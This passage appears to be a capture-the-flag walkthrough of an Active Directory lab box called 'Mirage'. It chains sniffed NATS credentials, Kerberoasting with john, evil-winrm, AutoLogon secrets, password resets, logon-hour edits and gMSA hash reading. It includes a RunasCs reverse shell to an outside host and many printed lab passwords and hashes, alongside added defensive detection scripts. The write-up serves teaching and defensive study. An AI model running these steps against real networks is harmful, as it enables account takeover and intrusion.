[89096] 2025/07/24 16:38:04.239920 [TRC] 10.10.11.78:56026 - cid:5 - <<- [PING]
[89096] 2025/07/24 16:38:04.239951 [TRC] 10.10.11.78:56026 - cid:5 - ->> [PONG]

We run Wireshark filtered on port 4222 and observe a connection in which the authentication, with the user's credentials, is visible.

image

INFO {"server_id":"NCDNCNVFKHC2CR2EKT6XQ7GOFXVHY26SKDD6JTDLLA3WTS4HE4BLR3DX","server_name":"NCDNCNVFKHC2CR2EKT6XQ7GOFXVHY26SKDD6JTDLLA3WTS4HE4BLR3DX","version":"2.11.6","proto":1,"git_commit":"bc813ee","go":"go1.24.4","host":"0.0.0.0","port":4222,"headers":true,"max_payload":1048576,"client_id":5,"client_ip":"10.10.11.78","xkey":"XAHH7IEAH4TJXIHLWHSRM2ZWG2Z3D3OA6ZJQ23AJYRKELVO2R3UCBHKG"} 

CONNECT {"verbose":false,"pedantic":false,"user":"Dev_Account_A","pass":"hx5h7F5554fP@1337!","tls_required":false,"name":"NATS CLI Version 0.2.2","lang":"go","version":"1.41.1","protocol":1,"echo":true,"headers":true,"no_responders":true}

NATS streams

With the nats client we enumerate the streams; the auth_logs stream is listed.

❯ nats -s nats://Dev_Account_A:'hx5h7F5554fP@1337!'@10.10.11.78:4222 stream ls
╭─────────────────────────────────────────────────────────────────────────────────╮
│                                     Streams                                     │
├───────────┬─────────────┬─────────────────────┬──────────┬───────┬──────────────┤
│ Name      │ Description │ Created             │ Messages │ Size  │ Last Message │
├───────────┼─────────────┼─────────────────────┼──────────┼───────┼──────────────┤
│ auth_logs │             │ 2025-05-05 01:18:19 │ 5        │ 570 B │ 80d22h45m18s │
╰───────────┴─────────────┴─────────────────────┴──────────┴───────┴──────────────╯

With view we read the messages in the stream, which contain a pair of credentials.

❯ nats -s nats://Dev_Account_A:'hx5h7F5554fP@1337!'@10.10.11.78:4222 stream view auth_logs
[1] Subject: logs.auth Received: 2025-05-05 01:18:56
{"user":"david.jjackson","password":"pN8kQmn6b86!1234@","ip":"10.10.10.20"}


[2] Subject: logs.auth Received: 2025-05-05 01:19:24
{"user":"david.jjackson","password":"pN8kQmn6b86!1234@","ip":"10.10.10.20"}


[3] Subject: logs.auth Received: 2025-05-05 01:19:25
{"user":"david.jjackson","password":"pN8kQmn6b86!1234@","ip":"10.10.10.20"}


[4] Subject: logs.auth Received: 2025-05-05 01:19:26
{"user":"david.jjackson","password":"pN8kQmn6b86!1234@","ip":"10.10.10.20"}


[5] Subject: logs.auth Received: 2025-05-05 01:19:27
{"user":"david.jjackson","password":"pN8kQmn6b86!1234@","ip":"10.10.10.20"}


17:04:52 Reached apparent end of data
david.jjackson : pN8kQmn6b86!1234@
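
Two separate exposures appear in this section and the previous one: a CONNECT frame carrying user/pass over a session the client did not require to be TLS, and application messages in the auth_logs stream that embed passwords. The following added example (my code, not from the original write-up or from the NATS project) is a scanner a defender could run over nats-server -V trace output, a raw capture, or a dump of stream messages; it reports every secret it finds already redacted. The sample lines are constructed, the passwords in them are placeholders, and the set of secret-bearing keys is an assumption.

```python
"""Find credentials travelling through NATS in the clear.

Added example, not from the original write-up. It scans text lines of two
kinds seen on this page: NATS protocol CONNECT frames (raw, as captured on the
wire, or embedded in nats-server -V trace lines) and JSON message payloads such
as those in the auth_logs stream. Sample lines are constructed; the secrets
are placeholders.
"""
import json
import re

# Option keys in a CONNECT frame, or message fields, that carry a secret (assumed list).
SECRET_KEYS = ("pass", "password", "auth_token", "jwt")

CONNECT_RE = re.compile(r"CONNECT\s+(\{.*\})")

SAMPLE_LINES = [
    # nats-server -V trace line: client authenticates with user/pass, no TLS
    '[89096] 2025/07/24 16:38:02.973578 [TRC] 10.10.11.78:56026 - cid:5 - <<- '
    '[CONNECT {"verbose":false,"pedantic":false,"user":"Dev_Account_A",'
    '"pass":"EXAMPLE_PASS_1","tls_required":false,"name":"NATS CLI Version 0.2.2",'
    '"lang":"go","version":"1.41.1","protocol":1}]',
    # raw CONNECT frame from a client that insists on TLS (constructed)
    'CONNECT {"verbose":false,"user":"svc_example","pass":"EXAMPLE_PASS_2","tls_required":true}',
    # auth_logs-style payloads (constructed)
    '{"user":"david.jjackson","password":"EXAMPLE_PASS_3","ip":"10.10.10.20"}',
    '{"user":"david.jjackson","ip":"10.10.10.20","result":"ok"}',
    "PING",
]


def redact(secret):
    """Keep two leading characters so repeats can be correlated, mask the rest."""
    s = str(secret)
    return s[:2] + "*" * (len(s) - 2) if len(s) > 2 else "**"


def scan_line(line):
    """Return a finding for a line that carries a secret, else None."""
    m = CONNECT_RE.search(line)
    if m:
        kind, payload = "connect", m.group(1)
    elif line.lstrip().startswith("{"):
        kind, payload = "message", line.strip()
    else:
        return None
    try:
        obj = json.loads(payload)
    except json.JSONDecodeError:
        return None
    found = {k: redact(obj[k]) for k in SECRET_KEYS if k in obj}
    if not found:
        return None
    # For CONNECT, the client's own tls_required flag says whether it would
    # have refused a plaintext session; a message payload is exposed regardless.
    tls = bool(obj.get("tls_required", False)) if kind == "connect" else None
    return {"kind": kind, "user": obj.get("user"), "secrets": found,
            "tls_required": tls, "plaintext_risk": not tls}


def scan(lines):
    """Scan an iterable of lines and return the findings in order."""
    return [f for f in map(scan_line, lines) if f is not None]


if __name__ == "__main__":
    for f in scan(SAMPLE_LINES):
        print(f)
```

The client-side flag is only half the picture: the server INFO captured above advertises auth_required but no TLS, so no client could have negotiated encryption. The fix is to enable TLS on the server so that it advertises tls_required and rejects plaintext sessions, and to stop publishing passwords into a stream that any account with read rights can replay months later, as the 80-day-old auth_logs messages show.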

User - david.jjackson

Kerbrute shows the user as valid.

❯ ~/htb/tools/kerbrute userenum --dc dc01.mirage.htb -d mirage.htb users.txt

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 07/24/25 - Ronnie Flathers @ropnop

2025/07/24 17:08:29 >  Using KDC(s):
2025/07/24 17:08:29 >  	dc01.mirage.htb:88

2025/07/24 17:08:29 >  [+] VALID USERNAME:	Dev_Account_A@mirage.htb
2025/07/24 17:08:29 >  [+] VALID USERNAME:	Dev_Account_B@mirage.htb
2025/07/24 17:08:30 >  [+] VALID USERNAME:	david.jjackson@mirage.htb
2025/07/24 17:08:30 >  Done! Tested 11 usernames (3 valid) in 0.506 seconds

This user has SMB and LDAP access.

❯ faketime "$(ntpdate -q mirage.htb | cut -d ' ' -f 1,2)" netexec smb dc01.mirage.htb -u david.jjackson -p 'pN8kQmn6b86!1234@' -k
SMB         dc01.mirage.htb 445    dc01             [*]  x64 (name:dc01) (domain:mirage.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB         dc01.mirage.htb 445    dc01             [+] mirage.htb\david.jjackson:pN8kQmn6b86!1234@ 
❯ faketime "$(ntpdate -q mirage.htb | cut -d ' ' -f 1,2)" netexec ldap dc01.mirage.htb -u david.jjackson -p 'pN8kQmn6b86!1234@' -k
LDAP        dc01.mirage.htb 389    DC01             [*] None (name:DC01) (domain:mirage.htb)
LDAP        dc01.mirage.htb 389    DC01             [+] mirage.htb\david.jjackson:pN8kQmn6b86!1234@ 

bloodhound

We run the BloodHound collector with netexec.

❯ faketime "$(ntpdate -q mirage.htb | cut -d ' ' -f 1,2)" netexec ldap dc01.mirage.htb -u david.jjackson -p 'pN8kQmn6b86!1234@' -k --dns-server 10.10.11.78 --bloodhound -c All
LDAP        dc01.mirage.htb 389    DC01             [*] None (name:DC01) (domain:mirage.htb)
LDAP        dc01.mirage.htb 389    DC01             [+] mirage.htb\david.jjackson:pN8kQmn6b86!1234@ 
LDAP        dc01.mirage.htb 389    DC01             Resolved collection methods: psremote, localadmin, session, dcom, acl, trusts, rdp, group, container, objectprops
LDAP        dc01.mirage.htb 389    DC01             Using kerberos auth without ccache, getting TGT
LDAP        dc01.mirage.htb 389    DC01             Done in 00M 52S
LDAP        dc01.mirage.htb 389    DC01             Compressing output into /home/kali/.nxc/logs/DC01_dc01.mirage.htb_2025-07-25_002539_bloodhound.zip

Users

We find nine accounts in the Domain Users group.

image

Nathan.Aadam

Nathan can log in over WinRM and also belongs to two groups: Exchange_admins and IT_Admins.

image

We also see that this user can be Kerberoasted.

image

Mark.Bbond

Mark, through the IT_Support group, can change the password of Javier.Mmarshall.

image

Javier.Mmarshall

Javier can read the gMSA password of Mirage-Service$.

image

Mirage-Service

It appears as the only member of Domain Computers.

image

User - nathan.aadam

Using david.jjackson's credentials we run Kerberoasting with netexec and obtain nathan.aadam's hash.

❯ faketime "$(ntpdate -q mirage.htb | cut -d ' ' -f 1,2)" netexec ldap dc01.mirage.htb -u david.jjackson -p 'pN8kQmn6b86!1234@' -k --kerberoasting output.txt
LDAP        dc01.mirage.htb 389    DC01             [*] None (name:DC01) (domain:mirage.htb)
LDAP        dc01.mirage.htb 389    DC01             [+] mirage.htb\david.jjackson:pN8kQmn6b86!1234@ 
LDAP        dc01.mirage.htb 389    DC01             [*] Skipping disabled account: krbtgt
LDAP        dc01.mirage.htb 389    DC01             [*] Total of records returned 1
LDAP        dc01.mirage.htb 389    DC01             [*] sAMAccountName: nathan.aadam, memberOf: ['CN=Exchange_Admins,OU=Groups,OU=Admins,OU=IT_Staff,DC=mirage,DC=htb', 'CN=IT_Admins,OU=Groups,OU=Admins,OU=IT_Staff,DC=mirage,DC=htb'], pwdLastSet: 2025-06-23 15:18:18.584667, lastLogon: 2025-07-04 14:01:43.511763
LDAP        dc01.mirage.htb 389    DC01             $krb5tgs$23$*nathan.aadam$MIRAGE.HTB$mirage.htb\nathan.aadam*$fdbc195b7cfcf804745fd0b61246e594$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
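
The ticket obtained above is an etype 23 (RC4-HMAC) service ticket for a user account with an SPN, which is the signature a domain controller records in Security event 4769. The following added example (my code, not from the original write-up or from netexec) checks constructed records shaped like 4769 fields (TargetUserName = requesting account, ServiceName = account the ticket is for, TicketEncryptionType, IpAddress) for the two usual signals: any RC4 ticket issued for a user SPN, and one requester collecting tickets for several such accounts. The svc_example_* service accounts and the threshold are assumptions.

```python
"""Spot Kerberoasting in DC Security event 4769 (service ticket requested).

Added example, not part of the original write-up. The records are constructed
in the shape of event 4769 fields; they are not real logs from the box.
"""
from collections import defaultdict

RC4_HMAC = "0x17"                # TicketEncryptionType for etype 23
SOURCE = "::ffff:10.10.14.104"   # how a 4769 records an IPv4 client

# Constructed sample events. svc_example_* are made-up service accounts.
SAMPLE_4769 = [
    {"TargetUserName": "david.jjackson@MIRAGE.HTB", "ServiceName": "nathan.aadam",
     "TicketEncryptionType": RC4_HMAC, "IpAddress": SOURCE},
    {"TargetUserName": "david.jjackson@MIRAGE.HTB", "ServiceName": "svc_example_1",
     "TicketEncryptionType": RC4_HMAC, "IpAddress": SOURCE},
    {"TargetUserName": "david.jjackson@MIRAGE.HTB", "ServiceName": "svc_example_2",
     "TicketEncryptionType": RC4_HMAC, "IpAddress": SOURCE},
    # Benign: tickets for a computer account and for krbtgt, AES256 (0x12)
    {"TargetUserName": "david.jjackson@MIRAGE.HTB", "ServiceName": "DC01$",
     "TicketEncryptionType": "0x12", "IpAddress": SOURCE},
    {"TargetUserName": "mark.bbond@MIRAGE.HTB", "ServiceName": "krbtgt",
     "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.10.11.50"},
    # Benign: a single AES ticket for a user SPN from a workstation
    {"TargetUserName": "mark.bbond@MIRAGE.HTB", "ServiceName": "svc_example_1",
     "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.10.11.50"},
]


def is_user_spn(service_name):
    """Tickets for machine accounts (name$) and for krbtgt are normal traffic."""
    return not service_name.endswith("$") and service_name.lower() != "krbtgt"


def rc4_user_tickets(events):
    """Every RC4 service ticket issued for a user account: each is a crackable hash."""
    return [e for e in events
            if e["TicketEncryptionType"] == RC4_HMAC and is_user_spn(e["ServiceName"])]


def roasting_requesters(events, threshold=3):
    """Requesters (account, source) that pulled tickets for >= threshold distinct user SPNs."""
    per_requester = defaultdict(set)
    for e in events:
        if is_user_spn(e["ServiceName"]):
            per_requester[(e["TargetUserName"], e["IpAddress"])].add(e["ServiceName"])
    return {who: sorted(spns) for who, spns in per_requester.items() if len(spns) >= threshold}


if __name__ == "__main__":
    for e in rc4_user_tickets(SAMPLE_4769):
        print("RC4 ticket:", e["TargetUserName"], "->", e["ServiceName"])
    for (who, ip), spns in roasting_requesters(SAMPLE_4769).items():
        print("burst:", who, ip, spns)
```

The detection is worth pairing with a fix that removes the hash's value: restrict accounts that carry an SPN to AES (msDS-SupportedEncryptionTypes), so the KDC never issues an RC4 ticket for them, and give such accounts long random passwords or move them to a gMSA, as the domain already does for Mirage-Service$. A password like the one cracked above falls to rockyou in seconds.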

Cracking the Hash

We run john with the rockyou.txt wordlist against the hash file and obtain the password.

❯ john output.txt --wordlist=$ROCK
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
3edc#EDC3        (?)     
1g 0:00:00:04 DONE (2025-07-24 17:20) 0.2331g/s 2906Kp/s 2906Kc/s 2906KC/s 3er733..3ddfiebw
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

Nathan has access over SMB and LDAP.

❯ faketime "$(ntpdate -q mirage.htb | cut -d ' ' -f 1,2)" netexec ldap dc01.mirage.htb -u nathan.aadam -p '3edc#EDC3' -k
LDAP        dc01.mirage.htb 389    DC01             [*] None (name:DC01) (domain:mirage.htb)
LDAP        dc01.mirage.htb 389    DC01             [+] mirage.htb\nathan.aadam:3edc#EDC3 
❯ faketime "$(ntpdate -q mirage.htb | cut -d ' ' -f 1,2)" netexec smb dc01.mirage.htb -u nathan.aadam -p '3edc#EDC3' -k
SMB         dc01.mirage.htb 445    dc01             [*]  x64 (name:dc01) (domain:mirage.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB         dc01.mirage.htb 445    dc01             [+] mirage.htb\nathan.aadam:3edc#EDC3 

Shell WinRM

Since Nathan belongs to the Remote Management Users group, he can log in over WinRM. We generate the krb5 configuration file for mirage with netexec.

❯ faketime "$(ntpdate -q mirage.htb | cut -d ' ' -f 1,2)" netexec ldap dc01.mirage.htb -u nathan.aadam -p '3edc#EDC3' -k --generate-krb5-file file.conf
SMB         dc01.mirage.htb 445    dc01             [*]  x64 (name:dc01) (domain:mirage.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB         dc01.mirage.htb 445    dc01             [+] mirage.htb\nathan.aadam:3edc#EDC3 
❯ cat file.conf

[libdefaults]
    dns_lookup_kdc = false
    dns_lookup_realm = false
    default_realm = MIRAGE.HTB

[realms]
    MIRAGE.HTB = {
        kdc = dc01.mirage.htb
        admin_server = dc01.mirage.htb
        default_domain = mirage.htb
    }

[domain_realm]
    .mirage.htb = MIRAGE.HTB
    mirage.htb = MIRAGE.HTB
❯ sudo cp file.conf /etc/krb5.conf

We request a ticket with kinit.

❯ kinit nathan.aadam
Password for nathan.aadam@MIRAGE.HTB: 
❯ klist
Ticket cache: FILE:/tmp/krb5cc_1000
Default principal: nathan.aadam@MIRAGE.HTB

Valid starting       Expires              Service principal
07/25/2025 00:23:05  07/25/2025 10:23:05  krbtgt/MIRAGE.HTB@MIRAGE.HTB
    renew until 07/26/2025 00:23:03
07/25/2025 00:23:09  07/25/2025 10:23:05  HTTP/DC01.MIRAGE.HTB@MIRAGE.HTB
    renew until 07/26/2025 00:23:03

We run evil-winrm, obtaining a shell and reading the user.txt flag.

❯ evil-winrm -i DC01.MIRAGE.HTB -r MIRAGE.HTB
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\nathan.aadam\Documents> whoami
mirage\nathan.aadam
*Evil-WinRM* PS C:\Users\nathan.aadam\Documents> dir ../Desktop


    Directory: C:\Users\nathan.aadam\Desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----          7/4/2025   1:01 PM           2312 Microsoft Edge.lnk
-ar---         7/24/2025   9:31 PM             34 user.txt


*Evil-WinRM* PS C:\Users\nathan.aadam\Documents> cat ../Desktop/user.txt
56c86aae2dee7b7b9e3e4e0ccc1cbe79
*Evil-WinRM* PS C:\Users\nathan.aadam\Documents>

In the nats configuration we find credentials for other users.

*Evil-WinRM* PS C:\> cat "Program Files/Nats-Server/nats-server.conf"
listen: '0.0.0.0:4222'

jetstream: {
  store_dir: 'C:\Program Files\Nats-Server\tmp'
}

accounts: {
  '$SYS': {
    users: [
      { user: 'sysadmin', password: 'bb5M0k5XWIGD' }
    ]
  },

  'dev': {
    jetstream: true,
    users: [
      { user: 'Dev_Account_A', password: 'hx5h7F5554fP@1337!' },
      { user: 'Dev_Account_B', password: 'tvPFGAzdsJfHzbRJ' }
    ]
  }
}
*Evil-WinRM* PS C:\>

User - Mark.bbond -> javier.Mmarshall

Running WinPEAS reveals a pair of credentials.

╔══════════╣ Looking for AutoLogon credentials
    Some AutoLogon credentials were found
    DefaultDomainName             :  MIRAGE
    DefaultUserName               :  mark.bbond
    DefaultPassword               :  1day@atime

These credentials grant access over SMB and LDAP.

❯ faketime "$(ntpdate -q mirage.htb | cut -d ' ' -f 1,2)" netexec smb dc01.mirage.htb -u mark.bbond -p 1day@atime  -k
SMB         dc01.mirage.htb 445    dc01             [*]  x64 (name:dc01) (domain:mirage.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB         dc01.mirage.htb 445    dc01             [+] mirage.htb\mark.bbond:1day@atime 
❯ faketime "$(ntpdate -q mirage.htb | cut -d ' ' -f 1,2)" netexec ldap dc01.mirage.htb -u mark.bbond -p 1day@atime  -k
LDAP        dc01.mirage.htb 389    DC01             [*] None (name:DC01) (domain:mirage.htb)
LDAP        dc01.mirage.htb 389    DC01             [+] mirage.htb\mark.bbond:1day@atime 

We generate a ticket for this user with getTGT.

❯ faketime "$(ntpdate -q mirage.htb | cut -d ' ' -f 1,2)" impacket-getTGT -dc-ip 10.10.11.78 mirage.htb/mark.bbond:1day@atime
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in mark.bbond.ccache

Change Password javier.mmarshall

Through IT_Support, mark can change javier's password.

KRB5CCNAME=mark.bbond.ccache faketime "$(ntpdate -q mirage.htb | cut -d ' ' -f 1,2)" bloodyAD --host dc01.mirage.htb -d mirage.htb -u mark.bbond -k set password javier.mmarshall 5upperP@ss
[+] Password changed successfully!

It returns KDC_ERR_CLIENT_REVOKED, which indicates that the user cannot authenticate.

❯ faketime "$(ntpdate -q mirage.htb | cut -d ' ' -f 1,2)" netexec ldap dc01.mirage.htb -u javier.mmarshall -p 5upperP@ss -k
LDAP        dc01.mirage.htb 389    DC01             [*] None (name:DC01) (domain:mirage.htb)
LDAP        dc01.mirage.htb 389    DC01             [-] mirage.htb\javier.mmarshall:5upperP@ss KDC_ERR_CLIENT_REVOKED

Looking at the user, we see it is not enabled.

*Evil-WinRM* PS C:\Users\nathan.aadam\Documents> Get-ADUser -Identity Javier.Mmarshall


DistinguishedName : CN=javier.mmarshall,OU=Users,OU=Disabled,DC=mirage,DC=htb
Enabled           : False
GivenName         : javier.mmarshall
Name              : javier.mmarshall
ObjectClass       : user
ObjectGUID        : c52e731b-30c1-439c-a6b9-0c2f804e5f08
SamAccountName    : javier.mmarshall
SID               : S-1-5-21-2127163471-3824721834-2568365109-1108
Surname           :
UserPrincipalName : javier.mmarshall@mirage.htb



*Evil-WinRM* PS C:\Users\nathan.aadam\Documents>

We also see that mark has permissions over javier.

KRB5CCNAME=mark.bbond.ccache faketime "$(ntpdate -q mirage.htb | cut -d ' ' -f 1,2)"  bloodyAD --host DC01.mirage.htb -u mark.bbond -k get writable

distinguishedName: CN=S-1-5-11,CN=ForeignSecurityPrincipals,DC=mirage,DC=htb
permission: WRITE

distinguishedName: CN=javier.mmarshall,OU=Users,OU=Disabled,DC=mirage,DC=htb
permission: WRITE

distinguishedName: CN=mark.bbond,OU=Users,OU=Support,OU=IT_Staff,DC=mirage,DC=htb
permission: WRITE

Enable User

We start by getting a shell as mark.bbond with RunasCs.

*Evil-WinRM* PS C:\Users\nathan.aadam\Documents> .\RunasCs.exe mark.bbond "1day@atime" powershell.exe -r 10.10.14.104:1335
[*] Warning: The logon for user 'mark.bbond' is limited. Use the flag combination --bypass-uac and --logon-type '8' to obtain a more privileged token.

[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-864204$\Default
[+] Async process 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' with pid 1336 created in background.
*Evil-WinRM* PS C:\Users\nathan.aadam\Documents>

We run Enable-ADAccount, and javier now shows as enabled.

PS C:\Windows\system32> Enable-ADAccount -Identity javier.mmarshall
PS C:\Windows\system32> Get-ADUser -Identity javier.mmarshall
Get-ADUser -Identity javier.mmarshall


DistinguishedName : CN=javier.mmarshall,OU=Users,OU=Disabled,DC=mirage,DC=htb
Enabled           : True
GivenName         : javier.mmarshall
Name              : javier.mmarshall
ObjectClass       : user
ObjectGUID        : c52e731b-30c1-439c-a6b9-0c2f804e5f08
SamAccountName    : javier.mmarshall
SID               : S-1-5-21-2127163471-3824721834-2568365109-1108
Surname           : 
UserPrincipalName : javier.mmarshall@mirage.htb



PS C:\Windows\system32>

After enabling the user, we still get the same error.

❯ faketime "$(ntpdate -q mirage.htb | cut -d ' ' -f 1,2)" netexec ldap dc01.mirage.htb -u javier.mmarshall -p 5upperP@ss -k
LDAP        dc01.mirage.htb 389    DC01             [*] None (name:DC01) (domain:mirage.htb)
LDAP        dc01.mirage.htb 389    DC01             [-] mirage.htb\javier.mmarshall:5upperP@ss KDC_ERR_CLIENT_REVOKED

Trying through RunasCs now shows that the user has time restrictions on logging in.

*Evil-WinRM* PS C:\Users\nathan.aadam\Documents> .\RunasCs.exe javier.mmarshall 5upperP@ss "whoami"
[-] RunasCsException: LogonUser failed with error code: Your account has time restrictions that keep you from signing in right now
*Evil-WinRM* PS C:\Users\nathan.aadam\Documents>

Logon Hours

Following the post How to set Logon Hours for Active Directory Users, we update the hours during which the javier.mmarshall user is allowed to log in.

# $logonHoursArray = [byte[]] (255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255)
# set-aduser javier.mmarshall -replace @{logonhours = $logonHoursArray}
PS C:\Windows\system32> $logonHoursArray = [byte[]] (0, 240, 127, 192, 255, 255, 255, 255, 255, 63, 248, 255, 192, 255, 255, 255, 255, 255, 63, 0, 0)
$logonHoursArray = [byte[]] (0, 240, 127, 192, 255, 255, 255, 255, 255, 63, 248, 255, 192, 255, 255, 255, 255, 255, 63, 0, 0)
PS C:\Windows\system32> set-aduser javier.mmarshall -replace @{logonhours = $logonHoursArray}
PS C:\Windows\system32>
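The array above is a 168-bit mask, one bit per hour of the week. The decoder below is an added example, not the post author's code or the referenced post's script; it unpacks that mask into the weekly schedule the DC enforces and evaluates a timestamp against it. It assumes the common reading of the attribute: UTC, Sunday 00:00 first, byte index hour // 8, least-significant bit first.

```python
"""Decode an Active Directory logonHours value into the schedule the DC enforces.

Added example, not code from the original write-up. Assumptions: the 21-byte
attribute is 168 hourly bits in UTC, ordered Sunday 00:00 first, byte index
hour // 8 with the least-significant bit first. The sample array is the one
set on javier.mmarshall in the text.
"""
from datetime import datetime, timezone

DAYS = ["Sunday", "Monday", "Tuesday", "Wednesday", "Thursday", "Friday", "Saturday"]

# Value applied to javier.mmarshall in the write-up.
JAVIER_LOGON_HOURS = bytes([0, 240, 127, 192, 255, 255, 255, 255, 255, 63,
                            248, 255, 192, 255, 255, 255, 255, 255, 63, 0, 0])
# "No restriction": every one of the 168 bits set (the commented-out array in the text).
ALL_HOURS = bytes([255] * 21)


def hour_allowed(logon_hours: bytes, hour_index: int) -> bool:
    """True if hour_index (0 = Sunday 00:00 UTC ... 167 = Saturday 23:00 UTC) is permitted."""
    if len(logon_hours) != 21:
        raise ValueError("logonHours must be exactly 21 bytes (168 hourly bits)")
    if not 0 <= hour_index < 168:
        raise ValueError("hour_index must be in 0..167")
    return bool(logon_hours[hour_index // 8] >> (hour_index % 8) & 1)


def allowed_ranges(logon_hours: bytes) -> dict[str, list[tuple[int, int]]]:
    """Per day, the contiguous [start, end) UTC hour ranges in which logon is permitted."""
    schedule: dict[str, list[tuple[int, int]]] = {}
    for day, name in enumerate(DAYS):
        ranges: list[tuple[int, int]] = []
        start = None
        for hour in range(24):
            if hour_allowed(logon_hours, day * 24 + hour):
                if start is None:
                    start = hour
            elif start is not None:
                ranges.append((start, hour))
                start = None
        if start is not None:
            ranges.append((start, 24))
        schedule[name] = ranges
    return schedule


def total_allowed_hours(logon_hours: bytes) -> int:
    """Number of hours per week in which the account may log on."""
    return sum(hour_allowed(logon_hours, h) for h in range(168))


def permitted_at_utc(logon_hours: bytes, iso_timestamp: str) -> bool:
    """Evaluate a timestamp against the mask the way the KDC does, in UTC.

    A logon outside the mask is what produced the 'time restrictions' message
    and the KDC_ERR_CLIENT_REVOKED responses seen in the text. Naive timestamps
    are taken as UTC.
    """
    when = datetime.fromisoformat(iso_timestamp)
    if when.tzinfo is None:
        when = when.replace(tzinfo=timezone.utc)
    when = when.astimezone(timezone.utc)
    day_index = (when.weekday() + 1) % 7  # weekday(): Monday=0; the attribute starts on Sunday
    return hour_allowed(logon_hours, day_index * 24 + when.hour)


if __name__ == "__main__":
    for day, ranges in allowed_ranges(JAVIER_LOGON_HOURS).items():
        pretty = ", ".join(f"{s:02d}:00-{e:02d}:00" for s, e in ranges) or "never"
        print(f"{day:<9} {pretty}")
    print("allowed hours per week:", total_allowed_hours(JAVIER_LOGON_HOURS))
```

Changes to this attribute are recorded in the 4738 "A user account was changed" event, whose Logon Hours field is where a defender would spot an edit like the one above.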

RunasCs shows that it is not possible to log in with this user.

*Evil-WinRM* PS C:\Users\nathan.aadam\Documents> .\RunasCs.exe javier.mmarshall '5upperP@ss' whoami 
[-] RunasCsException: Selected logon type '2' is not granted to the user 'javier.mmarshall'. Use available logon type '3'.
*Evil-WinRM* PS C:\Users\nathan.aadam\Documents>

With the --remote-impersonation flag a connection comes back, but it dies immediately.

❯ rlwrap nc -lvp 1336
listening on [any] 1336 ...
connect to [10.10.15.85] from mirage.htb [10.10.11.78] 50788
❯ rlwrap nc -lvp 1336
listening on [any] 1336 ...
connect to [10.10.15.85] from mirage.htb [10.10.11.78] 50792

netexec shows that the user now has LDAP access.

❯ faketime "$(ntpdate -q mirage.htb | cut -d ' ' -f 1,2)" netexec ldap dc01.mirage.htb -u javier.mmarshall -p 5upperP@ss -k
LDAP        dc01.mirage.htb 389    DC01             [*] None (name:DC01) (domain:mirage.htb)
LDAP        dc01.mirage.htb 389    DC01             [+] mirage.htb\javier.mmarshall:5upperP@ss 

User - Mirage-Service$

Read GMSA Password

Javier can read the gMSA password of mirage-service$, so we run netexec with the --gmsa flag using javier's credentials.

❯ faketime "$(ntpdate -q mirage.htb | cut -d ' ' -f 1,2)" netexec ldap dc01.mirage.htb -u javier.mmarshall -p 5upperP@ss -k --gmsa
LDAP        dc01.mirage.htb 389    DC01             [*] None (name:DC01) (domain:mirage.htb)
LDAPS       dc01.mirage.htb 636    DC01             [+] mirage.htb\javier.mmarshall:5upperP@ss 
LDAPS       dc01.mirage.htb 636    DC01             [*] Getting GMSA Passwords
LDAPS       dc01.mirage.htb 636    DC01             Account: Mirage-Service$      NTLM: 305806d84f7c1be93a07aaf40f0c7866     PrincipalsAllowedToReadPassword: javier.mmarshall

Privesc

We obtain a ticket for mirage-service.

❯ faketime "$(ntpdate -q mirage.htb | cut -d ' ' -f 1,2)" impacket-getTGT -dc-ip 10.10.11.78 mirage.htb/mirage-service$ -hashes :305806d84f7c1be93a07aaf40f0c7866
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in mirage-service$.ccache

Running certipy shows no vulnerable templates.

KRB5CCNAME=mirage-service$.ccache faketime "$(ntpdate -q mirage.htb | cut -d ' ' -f 1,2)" certipy-ad find -vulnerable -k -no-pass -dc-ip 10.10.11.78 -target dc01.mirage.htb -stdout
Certipy v5.0.3 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Finding issuance policies
[*] Found 13 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'mirage-DC01-CA' via RRP
[*] Successfully retrieved CA configuration for 'mirage-DC01-CA'
[*] Checking web enrollment for CA 'mirage-DC01-CA' @ 'dc01.mirage.htb'
[!] Error checking web enrollment: [Errno 111] Connection refused
[!] Use -debug to print a stacktrace
[!] Error checking web enrollment: [Errno 111] Connection refused
[!] Use -debug to print a stacktrace
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : mirage-DC01-CA
    DNS Name                            : dc01.mirage.htb
    Certificate Subject                 : CN=mirage-DC01-CA, DC=mirage, DC=htb
    Certificate Serial Number           : 1512EEC0308E13A146A0B5AD6AA741C9
    Certificate Validity Start          : 2025-07-04 19:58:25+00:00
    Certificate Validity End            : 2125-07-04 20:08:25+00:00
    Web Enrollment
      HTTP
        Enabled                         : False
      HTTPS
        Enabled                         : False
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
